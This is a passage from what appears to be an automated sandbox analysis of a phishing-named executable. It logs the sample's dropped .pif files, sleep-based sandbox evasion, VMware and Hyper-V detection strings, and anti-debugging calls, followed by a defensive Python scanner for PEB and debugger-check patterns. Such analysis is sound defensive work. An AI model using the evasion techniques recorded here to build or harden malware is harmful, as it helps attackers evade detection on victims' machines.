Source: C:\Users\Public\alpha.pif | API coverage: 6.3 %
Source: C:\Users\Public\alpha.pif | API coverage: 7.8 %
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep count: 35 > 30
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -99862s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 6852 | Thread sleep count: 7315 > 30
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 6852 | Thread sleep count: 2503 > 30
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -99734s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -99624s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -99513s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -99406s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -99297s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -99156s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -99004s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -98787s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -98656s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -98546s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -98437s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -98328s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -98219s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -98109s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -98000s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -97890s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -97781s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -97672s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -97562s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -97452s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -97343s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -97234s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -97125s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -97015s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -96906s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -96796s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -96687s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -96576s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -96219s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -96031s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -95922s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -95812s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -95703s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -95593s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -95484s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -95374s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -95265s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -95156s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -95046s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -94937s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -94828s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -94718s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -94609s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -94499s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -94361s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -94234s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -94125s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -94015s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -93888s >= -30000s
Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108 | Thread sleep time: -93671s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 7316 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\msdtc.exe TID: 6992 | Thread sleep count: 491 > 30
Source: C:\Windows\System32\msdtc.exe TID: 6992 | Thread sleep time: -49100s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\Public\xpha.pif | Last function: Thread delayed
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: 0_2_02B15908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA
Source: C:\Users\Public\alpha.pif | Code function: 13_2_001A0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove
Source: C:\Users\Public\alpha.pif | Code function: 13_2_001A589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.pif | Code function: 13_2_001B3E66 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\alpha.pif | Code function: 13_2_001A4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
Source: C:\Users\Public\alpha.pif | Code function: 13_2_0019532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose
Source: C:\Users\Public\alpha.pif | Code function: 22_2_001A589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.pif | Code function: 22_2_001A0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove
Source: C:\Users\Public\alpha.pif | Code function: 22_2_001B3E66 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\alpha.pif | Code function: 22_2_001A4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
Source: C:\Users\Public\alpha.pif | Code function: 22_2_0019532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 100000
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 99862
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 99734
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 99624
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 99513
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 99406
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 99297
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 99156
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 99004
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 98787
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 98656
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 98546
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 98437
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 98328
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 98219
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 98109
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 98000
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 97890
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 97781
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 97672
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 97562
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 97452
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 97343
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 97234
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 97125
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 97015
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 96906
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 96796
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 96687
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 96576
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 96219
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 96031
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 95922
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 95812
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 95703
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 95593
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 95484
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 95374
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 95265
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 95156
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 95046
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 94937
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 94828
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 94718
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 94609
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 94499
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 94361
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 94234
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 94125
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 94015
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 93888
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Thread delayed: delay time: 93671
Source: C:\Users\Public\Libraries\ymafvvdS.pif | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Users\Public\Libraries\ymafvvdS.pif | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Users\Public\Libraries\ymafvvdS.pif | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Users\Public\Libraries\ymafvvdS.pif | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Users\Public\Libraries\ymafvvdS.pif | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Users\Public\Libraries\ymafvvdS.pif | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
Source: SensorDataService.exe, 0000001F.00000002.1855950363.00000000004EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .inVMware Virtual disk SCSI Disk Devicet System Management
Source: Spectrum.exe, 00000023.00000003.1780783107.0000000000594000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: alg.exe, 0000000C.00000002.2678337066.0000000000518000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`VZ%SystemRoot%\system32\mswsock.dll==.aP
                  Source: SensorDataService.exe, 0000001F.00000003.1848760946.00000000004D2000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000023.00000003.1781177346.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000023.00000003.1780783107.00000000005AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007CB000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1700499143.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2504408832.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800721272.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1685939273.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1687626189.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2281172548.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1670852449.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: SensorDataService.exe, 0000001F.00000002.1855950363.00000000004EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: SensorDataService.exe, 0000001F.00000003.1848760946.00000000004D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter.dll,-2102
                  Source: SensorDataService.exe, 0000001F.00000003.1750375651.00000000004D4000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000023.00000003.1783409850.0000000000598000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000023.00000003.1780783107.0000000000594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
                  Source: AppVClient.exe, 00000011.00000003.1638891220.00000000004AF000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000011.00000002.1641101952.00000000004CD000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000011.00000003.1639261437.00000000004B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
                  Source: Spectrum.exe, 00000023.00000002.2675188373.000000000057D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Device
                  Source: Spectrum.exe, 00000023.00000003.1780783107.0000000000594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: Spectrum.exe, 00000023.00000003.1783409850.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PL[SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: SensorDataService.exe, 0000001F.00000003.1750375651.00000000004D4000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000023.00000003.1783409850.0000000000598000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000023.00000003.1780783107.0000000000594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
                  Source: Spectrum.exe, 00000023.00000003.1783409850.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: Spectrum.exe, 00000023.00000003.1783409850.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device~
                  Source: Spectrum.exe, 00000023.00000003.1783409850.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: xpha.pif, 00000017.00000002.1759317605.000000000287B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
                  Source: SensorDataService.exe, 0000001F.00000002.1855950363.00000000004EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: SensorDataService.exe, 0000001F.00000003.1848760946.00000000004E3000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 0000001F.00000003.1750375651.00000000004D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Storage Spaces Controller%;Microsoft Storage Spaces Controllersoft Hyper-V Gener
                  Source: Spectrum.exe, 00000023.00000002.2675188373.0000000000546000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !2Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
                  Source: Spectrum.exe, 00000023.00000003.1780783107.0000000000594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
                  Source: Spectrum.exe, 00000023.00000003.1780783107.0000000000594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
                  Source: Spectrum.exe, 00000023.00000003.1781177346.00000000005A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3ZVMware Virtual USB MouseC:\Windows\System32\DDORes.dll,-2212
                  Source: Spectrum.exe, 00000023.00000003.1783409850.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Spectrum.exe, 00000023.00000003.1783409850.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: SensorDataService.exe, 0000001F.00000002.1855950363.00000000004EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nfNECVMWar VMware SATA CD00NDIS Virtual Netl
                  Source: Spectrum.exe, 00000023.00000003.1783409850.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
                  Source: Spectrum.exe, 00000023.00000003.1781476971.0000000000590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter14
                  Source: Spectrum.exe, 00000023.00000002.2675188373.00000000005A7000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000023.00000003.1783409850.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
                  Source: Spectrum.exe, 00000023.00000003.1780783107.0000000000594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
                  Source: snmptrap.exe, 00000020.00000002.2678329194.0000000000582000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN
                  Source: Spectrum.exe, 00000023.00000003.1783409850.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `[SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: ssh-agent.exe, 00000026.00000002.2675416914.000000000040C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllff
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeAPI call chain: ExitProcess graph end nodegraph_0-38027
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe :: Code function: 0_2_02B2F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe :: Process queried: DebugPort
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Code function: 9_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Code function: 9_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe :: Code function: 0_2_02B2894C LoadLibraryW,GetProcAddress,FreeLibrary
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Code function: 9_1_0047D594 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\Public\alpha.pif :: Code function: 13_2_001BC1FA mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\Public\alpha.pif :: Code function: 22_2_001BC1FA mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Code function: 9_1_0040ADB0 GetProcessHeap,HeapFree
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Process token adjusted: Debug
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe :: Process token adjusted: Debug
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Code function: 9_1_004123F1 SetUnhandledExceptionFilter
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Code function: 9_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Code function: 9_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Code function: 9_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Users\Public\alpha.pif :: Code function: 13_2_001A6EC0 SetUnhandledExceptionFilter
                  Source: C:\Users\Public\alpha.pif :: Code function: 13_2_001A6B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Users\Public\alpha.pif :: Code function: 22_2_001A6EC0 SetUnhandledExceptionFilter
                  Source: C:\Users\Public\alpha.pif :: Code function: 22_2_001A6B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Users\Public\xpha.pif :: Code function: 23_2_00773470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Users\Public\xpha.pif :: Code function: 23_2_00773600 SetUnhandledExceptionFilter
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Memory allocated: page read and write | page guard
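The `mov eax, dword ptr fs:[00000030h]` rows above are flagged because fs:[30h] is the 32-bit PEB and the byte at PEB+2 is BeingDebugged, but the same load also precedes ordinary work such as walking PEB.Ldr to enumerate modules, so the instruction that consumes the pointer is what separates a manual anti-debug check from loader code. The scan below is an added example, not part of the Joe Sandbox report or of the analysed sample: it searches a buffer for the 32-bit PEB/TEB load encodings and the API names that appear in the call chains above, classifies each PEB load by the field dereferenced right after it, and returns a verdict. SAMPLE and BENIGN_PEB_WALK are constructed byte strings; the field offsets are the 32-bit PEB layout, which matches the SysWOW64 process tree in this report but not 64-bit code (which reads gs:[60h]).

```python
"""Static triage of the anti-debugging indicators listed in the rows above.

Added example, not part of the Joe Sandbox report. The byte patterns encode the
instruction the report lists (mov eax, dword ptr fs:[30h]) and the API names it
shows in the call chains; SAMPLE and BENIGN_PEB_WALK are constructed buffers,
not bytes taken from the analysed sample, so the scan runs offline.
"""
import re

# 32-bit encodings that load the PEB (fs:[30h]) or the TEB self pointer (fs:[18h]).
# 64 = FS segment override; A1 = mov eax, moffs32; 8B 05 = mov eax, [disp32].
SEGMENT_READS = {
    b"\x64\xa1\x30\x00\x00\x00": "mov eax, fs:[30h] (PEB)",
    b"\x64\x8b\x05\x30\x00\x00\x00": "mov eax, fs:[30h] (PEB)",
    b"\x64\xa1\x18\x00\x00\x00": "mov eax, fs:[18h] (TEB)",
}

# The field read through the PEB pointer decides whether this is a debugger check
# or ordinary loader/TLS work. Offsets follow the 32-bit PEB layout.
PEB_FIELD_READS = {
    b"\x0f\xb6\x40\x02": "BeingDebugged",   # movzx eax, byte ptr [eax+2]
    b"\x8b\x40\x68": "NtGlobalFlag",        # mov eax, [eax+68h]
    b"\x8b\x40\x0c": "Ldr",                 # mov eax, [eax+0Ch]  (module walk, benign)
}
ANTI_DEBUG_FIELDS = {"BeingDebugged", "NtGlobalFlag"}

# Imports named in the report's anti-debug call chains.
ANTI_DEBUG_APIS = [b"IsDebuggerPresent", b"CheckRemoteDebuggerPresent",
                   b"NtQueryInformationProcess"]


def classify_peb_use(blob, offset, window=16):
    """Look a few bytes past a PEB load for the field it dereferences."""
    tail = blob[offset:offset + window]
    for pattern, field in PEB_FIELD_READS.items():
        if pattern in tail:
            return field
    return "unknown"


def scan(blob):
    """Return sorted (offset, kind, detail) triples for every indicator found."""
    hits = []
    for pattern, label in SEGMENT_READS.items():
        for m in re.finditer(re.escape(pattern), blob):
            field = classify_peb_use(blob, m.end()) if "PEB" in label else "n/a"
            hits.append((m.start(), label, field))
    for api in ANTI_DEBUG_APIS:
        for m in re.finditer(re.escape(api), blob):
            hits.append((m.start(), "api string", api.decode()))
    return sorted(hits)


def verdict(blob):
    """Manual PEB field checks and anti-debug imports count; a bare Ldr walk does not."""
    hits = scan(blob)
    manual = [h for h in hits if h[2] in ANTI_DEBUG_FIELDS]
    apis = [h[2] for h in hits if h[1] == "api string"]
    return {"manual_peb_checks": len(manual), "api_strings": apis,
            "anti_debug": bool(manual or apis)}


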